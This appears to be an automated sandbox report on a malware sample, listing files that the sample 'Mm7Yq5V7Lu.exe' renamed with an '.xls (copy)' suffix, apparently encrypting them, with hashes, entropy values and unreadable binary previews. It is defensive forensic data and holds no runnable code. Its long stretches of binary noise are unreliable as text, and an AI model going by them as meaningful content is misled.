                                                                                                                                                      Preview: .*v.U........l.u.8+9.N.m.q.......(........+..a.........ht;.vP..]. .zi......D.*k{.C..._......~.A.bB....R.........G...LO..9|.|(jb...v...........~.A3.1..2\.....ML...I_.-L..4....F.L.Q..R:..n*+......qQ.c&..H....=..@..Ar4guJ..m.SN.E....}...\...T.7.g{.Lx.Q.-%..Ix..FR.....a..|u..W......Z...6.R..f.....u...v.3<P9m'.T.6..~J0..L...].D.E.J...".....4....S.[CZ.Q....}.~.%K+H...7...".t.34h..6....... i.:.fr6..T....o&k..p.V-...PXU...].......i{.......;..|.X...4,..d..nu...;.]&TH.1....)!3..~..v...6.....r..AD...N..Q... p.U#.PR!@cf....]...bD.[e..`....*.$...e~A..6.....O./....9. ..<wK.:.....R....h*&.W..Y.w.%e35<2..U&....W.2.^..;.`u..q? .?p...@%...K...,....N"T.....^>..H.%d\....tP.r..k.&...._.."....R...S.V.}ao...,.)...\.G..|zj.P.~..|h.Z...4.ay.MV.%..<m~....L.".zT@!7.=..W1..({M=.-H:b..@c.GA.`.............L.....$....B..a.]..l...`.c.!.".w..g..."...]..e1....s.X...C...G..ru.`.As..._..W..:.t....0..!,~.w.b)r+W.\..:6O...|..`I....v.....eM.!....X.a.YZ20]~.C.`.....M..Y.._GN..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\cursor-replay[1].bmp.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5232
                                                                                                                                                      Entropy (8bit):7.764997310745922
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:EZQu+Ez99nfu2tW7Lir9JDBqsraz/MTXH5fooLffWnBKCiThOZECVdOzTED15:EZQZER4PLsksObMTX5ffWnAFOOl+
                                                                                                                                                      MD5:DD330BCE426A8AE2D2517AC104589A14
                                                                                                                                                      SHA1:7AE49448E26B8332DE7A1606D3DE75BDA295CB89
                                                                                                                                                      SHA-256:F26C36394089E45B60049D2A8FC87DF67053A3889FF8BE15617C6A9E8DEE3CC3
                                                                                                                                                      SHA-512:B8D56F848BE03D4EE98617BF4DE72681EBC8C6565006486BF214ECDBE18EC4099C81C2739DBD98AB22B6A3A02877660A352DA331580FD5D900AD63BEC2EBD754
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..L...............@0.y..2....w~oS.-O.&....u.....U.L..E`i..}.....T.h...\.V."...Xgh.c.....\ ...M.@1L..'.V..hK.<.......R.vS....J...3..Z..{.<..t.o...(&.".R....-....xZ...Sg.__..O..jE..1..i...h%d.*@..9...Lf..p...#V.)p..._.......g$L9...PX..v.;..N....O..u...#.....}.U..n.:..F%...."..:.;.y..x.G...o.,.e..gH!.)7=!..l].....8.<..8G..<.u...;.....)m(...E...w0........qjW3.W.n.! .u.4....I+...K..p._...v(.p.3...`....U..a.V@A....;p*.y{5.Z..%.H.%..-...=.......(..P.9.C...z.'fy......k.Z.....<.\......C.&....)..Xh.G.mw..#@..e..<"..|..T...9..9".6...m.v.8...tL*....!.h8.|./gR....>.*yZ...8.).l.h..7..Uz|.+9P...=z.!.C.u.(.b..nn....i...j...q.Im.\./....u-*JK?..$bg..z......zo.:.............O.D~..$!-ZR.....#..ftdB....Tt..T.7`...E.m...L....2....j3....y...Pa2Th....R.u..;T.....!bNvZ.A.-..s........m.........|...M".;.y..[gD...y[S...<...9U.c.._.....-.pQb.....'..-.....-.b.o...>.=|?..!:.j8..}....|R..".4.2.+.Tn...y..}a..?~7..%..^........{`..$.....<..)..k$A.O.m.e.v....=@
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\de-ch[1].json.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):141123
                                                                                                                                                      Entropy (8bit):7.256545339393706
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:dyAXI5YxHJLnfxhXDtzXuBvBhnJzQ15yG+7Bb1rEdxavpGLmhrqm0D/J6qOckgsD:kEFnfHBD+h0T+/wdgq/J6qCiA
                                                                                                                                                      MD5:51355529EAE4E1300CBB1C79BBAAB881
                                                                                                                                                      SHA1:1BFCBDCCF2D6F3D8EE4AB17340D3A6A95B0DD41D
                                                                                                                                                      SHA-256:CAC1AD1445AD2BBFC5BA39C196DD1BA292F7D54DC6B8F8B65A39E0A5F309391C
                                                                                                                                                      SHA-512:CAAC0DB64C86BDEB44FF901B4CF92ABD705FD055C2D26F2A2927E7A64FFB01D5BFE8E305D66A53F17446F115562144EC1773EDD3386F5DAA00F87333E7C5C2B3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...*"y.....oV3.b......d..z..'.:......<.A.s.w..w.'6,:.CU.T........7..9..<zY....Hm7..N....E1S..y.A.t...R.r;k....b..k...L..n....,-..i.[.......@.;.'...`~u..*n..?...r..fWc!..quC./..r.I.....i^k.H.^.zy.M.1..I.2i@.....ig^.;L.....o...t..ApJF./3H..i..M..8'....M......./.D...D.m.a.u.,;...z^..5..eij.....yy..LK=....B..s.D...4n....)C.r.._.bD.Q...i^..].R.r....9.a......z....n\.t=...S...K....J....z.j.s...1....._..4x..D.^j.a...7%[HP..4.kY...f/Jt......ms=XGw..[..2S.e...x...L.......P.=.W.(..5...- ..M..f.;...M|.x.q.{...q....#...L.'.FM..<..}Jr..;)...a.).7Z.! e.)........7?...(...;~.[W.<.3NB..v_=I>...Q.._..PJ.L......F.;.Q........2..N..`.r.l../q..Ac..Lg.y..z...w.f..+,d....).b..-..{.-..*}#..u /.HQSV.M.".Bz.......]..__....nLo..N...DJ-.x.{+..[.<..rUw.@F..?J>..[Pv.].........?.g.W..)....<.`.,?8...%a.rnZ..R.9.2(....V..Ug...ZW._.".\...,-..7m..R...P.kX.@\..8Q5..j$.P...2...{..Y..._?E?..{M.?.y..x..z....B.t.....V.S.l^Mof.-..5..<pO9G+1r...L.)..^N.;.......dV..|.P.^...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\eRYlUYIMYsB_Pt8B7FTik-pl5cs.gz[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1184
                                                                                                                                                      Entropy (8bit):5.816437951764628
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:P6Yily7KbP5qzzK8sevWAVgKTaCB7RZ0cHYIgtyUza3:P6Q7+5qzzCwgck38x
                                                                                                                                                      MD5:E39975C9129B932AE94B494B6F80B137
                                                                                                                                                      SHA1:4C666822B9CF5F1DDFA700A3B333DA7341B56CE1
                                                                                                                                                      SHA-256:8A700A617F4ADB35286D6F154C010BE7ACEFD50C8D38A780EFF525F450C47A94
                                                                                                                                                      SHA-512:3506273D468DA88B1565AFF78AF5A4A98696C736777044E3B064A96833A532833B8A42C6E92CA1AF11E3B90571903BCE73EB18BA8B8A791DCF772093A0B64421
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....o..\z..C%.4...8Fg..0f.y..+.....f.....;.u.j...>..1....V.F....v4....R..O.J.95}+.Cq~G`..G..\/.h.Z.....GC...X..\....2...X._.%Z9Ap..A..A`#..f.S.M..6...`^.+.$.k'.\....D'h.....8.=.Y.R..r.P.."P....<...(...v$,.+.W........r.n...O..\.GM.z.G".O..{v.\.m.G#.n....{.y..*.=..%..?.^...+..\'.B.8Xr..,.qM....*K.meiZ...{.....Ai....i.m.`...z).W8.a.TS?3.........:...p..d..@67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\f[1].txt.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):31018
                                                                                                                                                      Entropy (8bit):7.429844266543197
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:YXc4zcr4WioJrovKY9232m4McezNGaLValkkG/Y6gmgdc09p3updXyFVUhd2dfnT:Mc4zTyY/MXNGaLVa+k4yhjX+pg3QA
                                                                                                                                                      MD5:2D5320759B96DF6464E222B7A67C3584
                                                                                                                                                      SHA1:E4D8E494736B037EE1992B509A836C651E5A5B72
                                                                                                                                                      SHA-256:899C3263F7231EC74342C9FDE39B8799F5721A75E235EDD4F218F397A44D45D6
                                                                                                                                                      SHA-512:A3A1F2CFD322E9E655528300ACC6D661AE50137AE27E34B6F0DF0972EAA67A8406C33C321320890C402D6E7A0B906012107A5BC764655FFCC9FA1D047314A867
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: I.;...`.2.93Q~%2..).._......n......Ru.$\..`.WrM....G. ..t..75....J.C.k.2.`...j..).....R..1U.y....3I....=.....P.[...A..*$../Q...w....vPW.T..S.s.L...........=y.|...o^.t.C.......d..I....1.q_...Q..!9i.3...&.=Y+.{..AC.\g...ez.....].c..<h..>.T)b.$...W.jTL9.=..+hg.Z.Tc%......z.]}s$.+...D..; .....i..Z\E.~.........f.@...xm....P..F..J..)..oTI0.._.!....Qa.1....`.O+U`U5.......g[.Xm3^a..xo...S.[....R.5......i.......m......X..J..].~#8...y.,.NsD......1......rXux...k..vt1...F..ZU.$.)....5s.Q..8.Z...Kv.h...b..i.!......%.Q.2..L.6...jb..oa@..`.@@.C..N...u.$.L. ..../.C.u..K.....l}...q...r.9..K.a.{xAW^...5..y...[Y.j.....CY..@*7...?t...r^..[".@........vw...1.0..@.B*..3../.W[P..Y[JA(.<.E(.\y..}.M.f.C..O... +....=j...L..8x..!.?k.W.......L.=[..3....0....M~.Y.|......['.m4.Y....\...L.P.AMo[w).&_........mj8.7..:.yG.5..Q..d{.n.....f..!..l.7...IJ(c..R...en.s(j.........ZN)....P[....G#..*-...kYp^.+...."u.F.~.....R..;<......S%Z ]...!.|J.h..zx...&}...*3...nz.J._...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\f[2].txt.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3008
                                                                                                                                                      Entropy (8bit):7.474087567115859
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:VHtgLmHSCyGDjXbh4Wum/kHrOwM+hHSPJtIDBXsGgZDzCwgck38YGY:VHt+S5zF4sIqwMPxtIDBXVoDzTEP
                                                                                                                                                      MD5:072B6E8EDDDF802D1BFAF486FEBE4AE4
                                                                                                                                                      SHA1:4D942EF688E4E870BABE9D730C41128D5A3E7DEA
                                                                                                                                                      SHA-256:92FA07F5EA7787D802095B50201E5C746820A88060BEAB46591A7E4F936B7AD9
                                                                                                                                                      SHA-512:90E78A916611BBDE51A335DE3120E090B97D05EF9C88AFD929C0B0427D44442C411698260B2EE3E055776C9C2A0A19FD09728FD59DFE842D04B427AD7E90668C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: x..Y~..'.h.u.V&.k.D.d....LKw.>#/.qe.^.........p.~.."yu....,.;..ZrZF..i|...Me...c(.(...w.."`...e..C.....o...Y...../O.I..>.d....&2[&"..Yz..m..t.....~^.?....y].#..Q.5GX*C......o.3.G^.Y.W.iu....o.Ce<k6..Fz..Lj..[.F..9..w.......w)}.y...7..|..-.!d......1$...!..MX.uM...m.~...n.....y.a..:@1...}K~-...g....uK.^...Sh......g\.}..w.%..8.C..h..!........5..l...q.^:......bM...E..I.F..$...i..6...LI....q`........9..C[.$`...l.W......V7LF_.......>....V9r ...".@.F.....0.b.=Xp..`yUh.W@.,.m.,h..8.i,..e......._..*..=..GM..H...<.....m.{(.b.g.M.X./.TG.{2.8q....._.=..2...v...."6.,W2..s"C.......In>.F......z.&.>...%...T.WwXOz...[<...4......G./.t.........#..N...&.U ...}.6..e..d..k...g..m.:.$...*.g..&.!..X8.%yo...d.S.Ei..9A]....>.'N.......V.i.t...Y8# ..sq...]-.L..[ .@..../....E...=....<v.J.5......q.......v0...u.9.i..tP..M.....Bp..&.u......;{.P.0dg.........@....L.".W..-s...(..Qj.........D}.Kl.....f..wd5>.0.......;.j....$.....Q5?....7.S..?.(.v....G...l.I.b.@.|...rE.#.CSg..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\fdVZU4ttbw8NDRm6H3I5BW3_vCo[1].svg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1616
                                                                                                                                                      Entropy (8bit):6.648519423315347
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Ewo4apS8LUXMsSNAZ+kM862kKWJq+M7ayZ7HzK8sevWAVgKTaCB7RZ0cHYIgtyUT:EwoBLsbS5bdYWI+M7HzCwgck38FmF
                                                                                                                                                      MD5:C5C281BA25557B14CE6F3F43CD9138C7
                                                                                                                                                      SHA1:7FFE830BF758B7B8DA7191B206AE5065B03E37A7
                                                                                                                                                      SHA-256:DCC9A5E1B9127EA8249ACE194318762D4F6E9CB89D2DBBC67AE242A6F3D8F96F
                                                                                                                                                      SHA-512:310A6B6D875D72CD4A3015CEA0CCA8EB88134B7AB0AB8BFB97AA589795F2B60097120ACE0A884A3E7D06DEDF8F06FA993892B87F61A56FB86D575635B7A278D0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .aJ....... .4.\...rK... .k.........i.# .zo....'1.iHm...<E).}J......L.P..A&7.......[.>.l)......g..d.J."0.....\..~...|..~..{.~...=..j.>..pV.D{M....{.R..S .ze&v=.s..J/b.`.G..yB%.3k..z/f........O..j..w.Q...*(...P..>An(.._..+Ga.....x:...c...A&..$...ZQ_... ..........`-l{.z.....E~.&J.~V...'...~G..... \N.[.(B.#.`y......K..s dg.A.Sx...I......X.`9b..S.}.K.&:.)....VxT...$Q.<0g3n.......i....B.(.a<H......Cl.4v.........9..p.q.g....m....L...gM.S.T.....@G..?m...]......g.....d.N...5d.2...g....6vaJq).HT.R+....C....)IqxKWc..R..".....*..mD..gY.-.2.Vr..OD=.n.c&.F..0(..=....fvy....juV........S~r...9.>..|.V....i..'..........\|.B1.].....0...D...ui.;.5[p...v..UO..._.MS...-Tg...2...........4S/..s|..T.R..,?*..{.E.C|..+My3......\.7.....q.Cm....M..!..=|....[(WAi/..Jt.QZ.J<..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\google-canary[1].png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3376
                                                                                                                                                      Entropy (8bit):7.561004767789836
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:XTm3tIv31n/tGKvUaTHzCxGW9oEN7JeSFzTE9t:XI03h/tDvRTTC0WuExJp96t
                                                                                                                                                      MD5:BE5FAB6B94143E5848446131AE872519
                                                                                                                                                      SHA1:8869D75ECE910A69760B279B31D5FB033FD7785B
                                                                                                                                                      SHA-256:1F5DBE58C455C2522A164B0DF5E79ECC5D35AAE2EA650DF8CAA5913CA3D2F26A
                                                                                                                                                      SHA-512:A11025D66896B028DDF810A1FF0D8B557B9819E92DF01EB5A0AE5142FA1A5272B1190A29B095D4B72820BBF50D0C2E36B84B90C077BF53E1154CACE979A18C06
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: -.....p.....@}.el...q...jmk+..{Z..n.u..."..0.B...Jn.q............@@.u.S..O+.T0..=..O;...|8.'oN.vQ.h+..U...<5..\6Z7.+..PZ\=......M0....Wy....b..;.T.L.2..../..........Q...q[d.60I.....m.k2.....F...^v.D....OL.$.h....f@.....?U.v...,.........!.l....A.T-..%j ....G.I.y.8{'.iV..9......)O.&`..6.&.Z......@..{xYE#..n.|..$..k..Y;..).....E&.....h}..'%..r-.n.8...?...xIkr.S....c.;.R...J.+.M.Ln.....I.s.t.'...J<n...8../.j.z......L]..4.'\.-....z...q...5g.Y..V]..x^...Yg......3.x.)..H...Wj..E\;Q.....7...j...#l....z.X.dh.gP...c.5.Cm....y.K2...).f|j....Ch..Y...7.)......@..=......Jl...V..uT..x.r....jO'.|Gq.5;,.......@=.R_S..6..iz...'I]W....6k...U..l..dc...[.X.xQ......1R.P.3..6...g$...............$M.1.W.i......Z..i../.LD...\.N..\L....J..E......vI..mn...5mo....b.<..P./.....q..z.6P......$.....}...D..._..`.....n.f.........w=..2_.A...;.-um...h.9..^.,4.&.V/...zh.W~....".@v#6!tp.R.sj..(....=...4....&6...........C{...2....A.Z$$....}...x....t.....M.. .).2..vI
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\hero-anim-bottom-left[1].png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11314
                                                                                                                                                      Entropy (8bit):7.9236751053292345
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:uPlrU+8bctH3kghbrKyxnXQ+ROP1BBu+q8ifsoZ413iSgqDP3TG35p:Clrow375f5XQxB8+q87W6SrqDipp
                                                                                                                                                      MD5:3E25714FB98E2981DB1B7D397C20BF7B
                                                                                                                                                      SHA1:B6760E7CD3083AE5241F56113573892EA7B440B7
                                                                                                                                                      SHA-256:37D443362F800DA2D58E1A0AB4532040D59548313A10977602A3C92AF4943FB5
                                                                                                                                                      SHA-512:D53FD38F3685E9EAF9E701FA5F5EBEC9537426C72FAF043DB09A22190701D3362CD12151E5D3B618C3E05E24386AEE799F7723063D1FD89EC9932E4E456A928A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .].V".K............-.&...A........{U?...y..K.).S.JOw..va..* S./IF..a#ne1.B[k...>2z(..,.....^|W.L.....<".'^.f4.q..S...k1.7x..@.7._"..q~b..}.<j.....h.......o.......4&....h.#2...Cg.c.D.k.r...4.X1.d9..i.......Qo;..3C.n..b..?pb..o.Fk..h.3.....R.K..K...B.FK8uh.w..W... ..?.......oI.Q.f....Pjw.@..B......H...3o.F....%...-..,.8.}.WhEv}..W..X.W..H.....X....]T.U$.c.......hO...........W...Z.nf..L....<.......K..#.....t...}..up....$.'d5P1.:w......e..p.......P.....+.....V.....p.E.<..4f.|..g<.h9/..>@..~.........C\..SG...JX\^1..Mv1R..Kh...4....j..8z..iVT......X.....}......"<....O..z..Y..............,.C....az.......Psv..c0.h...l...*....&Y.K...4o.....+.^.?.)..\.......L....7.3..(..[`by...GIV.F6.-.b9..F.w.V2.[b...*.....X.XpH.ZZ.U.*..:....^./..;..N.r..!..?+.#..f]..3.P....eIr't#......0.E.h...Q....z...M.[...}n\.H......*5..C_rC.".k..f3...1..K.6So@....1o......W&.U)C..r.%5n..z+.*..!. '.n.n.3.m.(W...~..iL.........&.t3L.uB..*....r........7...y..z..X=#......q....c...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\hero-anim-middle[1].png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2784
                                                                                                                                                      Entropy (8bit):7.403397049221923
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Cb3FKWhHvAikdfSjjLRFfZ/0aN4ktzgpiQRtaOgF/kRzCwgck38V:Cb1KWFKfENNB4ktKVaJezTE6
                                                                                                                                                      MD5:BBBBBAEC357A7E0165412A2FE8A0B968
                                                                                                                                                      SHA1:6C443A7B84FFC82A7ED39C63ECC345A5AD8012CB
                                                                                                                                                      SHA-256:47C05B7752D4CE0B1EA13C0A646CF0A8B3779BE1A116AFF5CF42BA9F64B7064B
                                                                                                                                                      SHA-512:820582E2C411B430DA14D5DEF88DA28F72E35A5FF4DA7527EADBD4029140403E1431A8F6BC763BA10BD1C0F4A5472BF6DC41964422BE5F7084914145D00FBC30
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..R..K.x........V^........%..2....L..2.D.R.......po.."..{.k|. .o.....p....U..K...mfk .[p,=FPik...`.....X.}.#.;..KsT.~)...M....+..........>..t.w..y.U.c8..,.x..W...8.......-b...$....s.5.X.w.:.2.~....E.mL..+..iL...B.!..........'......I...1B.N.L@2R..Vn.#,...;...."}.;S.l....m.|..[........@.{E.U..~..]GWc.....!V>baqN.....2...U.q.~......!...Z..._.U-..-..v.......bn.*B.......T...f.e...[..wSOX<.:...{....l.....*.v...<...uj..8C...\....G-..VA...Lc2.<.2...|..{(AqP. .V|..I....X.v.v.0.E.j..O...S%.C3\.r}........e[..N.Sv.(U^.o.g....l....T...[-.x=V...8.VC......G...Hj.J..!..b.g.%%.... .hs..d.*.I.PW.a8..R.Wt.10.nF.y .A..K....Qf..z.Hc.v.fmz...TR...Jj.B/um..,.B&e...G.u.;.....H/S|S.'?_...N...P`........I)x......5....G.....MK*..?....s........D.!8jJ..%.Q.4.j.(....m..b .|..D...e$.3...v.......h.t&.L...`Cz9..D...=H!2.q#e...Y..=$.I....u...w....].P.M|...`M[.1....Yd.#.6...m.....D...O...-*mD...;9.......|.p.o.|.....$[.L...~.d.......Q....^....J:c...Z94......J..-.:..9..g..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\icon-file-download[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2112
                                                                                                                                                      Entropy (8bit):7.1215465980828005
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:pMvssfSYIdlmt0dtWLjGkaufk6MzCwgck38XZz1:pMvVfidlV7m4YszTEU
                                                                                                                                                      MD5:107DD2E2C4EED7DD6BBFBC73C837EE3A
                                                                                                                                                      SHA1:FC6F0321ED7AF0671C13AC77FE45F394BA2976EA
                                                                                                                                                      SHA-256:882C2949657BD9F5F4CDA921C42CACA5C1C052AA957483F5538BAEA7888FE51B
                                                                                                                                                      SHA-512:92A3EB6B266C509B2FBD96153617CB5B97720072B5B8C044C302D022C641EE7F29EB8862C470F007F4DD53AF7F9E05DCA0CC2DE9892C809ED64ABF5181F6A7A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..$......[....D&..L..V}.T.[.S...\..mSk&...P....X...H.gi.bK...r."Y....H.'..=.....\................x...C.V^7}\.5...|V...ra... ..R})....+*.........YC.........^.T!....wc1.9Nlf......HC..k........m.p:.(/...;...\.....W..^~.v.y.....#<..E...~.......{..v9L_N..@..]...ti^...0.c.j.. ..-....v....(K....;R.4..:TclG.H.........|..:9....._..Pg>..........e......m.'..9......!.M..W.f..S.]%........aE...`...F.=.V.%.p.)...$..q>..c,..X...V..R.q...e....WE~..=.>..R...aK....r.i.....:.~f....y.|..rF...>..W..4..nW.....<'.,.D~..c.g...Y...9..u..CT.C;"?...O...z...*L...*.....8.8.F...K......-...1a...B).5.^$`_.6~......~].{........z....J....."f..f.9.M.`..Ed.g.x...se..........vz...}..|f9./#..&,.o,v....d..#.."c...kK~.&p.k<....*.4{....4d.+).7..#..M.w.#.......Q..*T8...R...E.....ft!%....g...%.dns..%..v....~.DoB;.c.^..D.../.{u...a...;."=~r...m..^.&.>...".....Y.U..qd.E.......]......"J-.b....L.....$x...u.]sG..B<?d..S..L.Kz..k./..6.N|...{.@R.e..] "......{...........Zj..=H...(I.r..91x.ub.?{
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\icon-file-download[1].svg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1264
                                                                                                                                                      Entropy (8bit):6.042529263169807
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:gGzN5WG74ZWW7u7q6fkTzK8sevWAVgKTaCB7RZ0cHYIgtyUzQRSAc:jpcZI7BGzCwgck382H
                                                                                                                                                      MD5:24039E6014B324175B1B2921A8156BF3
                                                                                                                                                      SHA1:B41F398690C25EA682DCB5DA1624BFC836650AA5
                                                                                                                                                      SHA-256:E5E62EE682507D16BE89FE99B597F4D4E80ED60896EF1D49168F168C73AC9544
                                                                                                                                                      SHA-512:D9E205A49FF275038F239667D1C36774AE8286FACB3ED256469E97A80505A0FDBD38A4171FA6A97A4573BFDFAFC14573F1E3BE5A74210B033C64FC3907AEC8D1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..........v..Y...tUU.4d.....|.?...Z......YPJj.....S....f>.e.`.7...^X.......'....E.Q...Py..-c...'. ..W9.......<.).2V.".ZL...)~=p.q...Ax....f\A..!.....).....|..|..5.-...7G}>.CN..K...E>/.nR....Q...2?....k...b.6%.$..1X...S../I....C.I.J=oh..].a...."....b..[..b_...1..v[..z....n...-......r..G.......(.,....!..I..NZ..B..!.....IK.m...'R.@..MA.r..k.Z...SV.r@.........H....V.R...q....<.kA^./Ui......--....k...s..O:o.s..0O...M.`-l.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\icon-youtube[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4080
                                                                                                                                                      Entropy (8bit):7.660567833164559
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:DvwuN0CXZKU/beNmqs79uDq8sdmloTIUM0xzTE3:DvwuNdcm37Aq86HM0Z2
                                                                                                                                                      MD5:AF49B2AB3DC976EC48AE556A0B456737
                                                                                                                                                      SHA1:0EB3804AC1E123D09220EF33AB049AD83A35736A
                                                                                                                                                      SHA-256:CB5A584E942CF627E38151E5F215E363C70E6507476CA2359EDD2F72B75BBA77
                                                                                                                                                      SHA-512:7AE3DA0E37AC9D613C7F09AB8A60B622641E0B3ED2FAE4B5433668989384D0A969872F2E6619C5AF2DE59BCB4C8CF0D8179BEC9970124AE4234982F049004B6D
                                                                                                                                                      Malicious:false
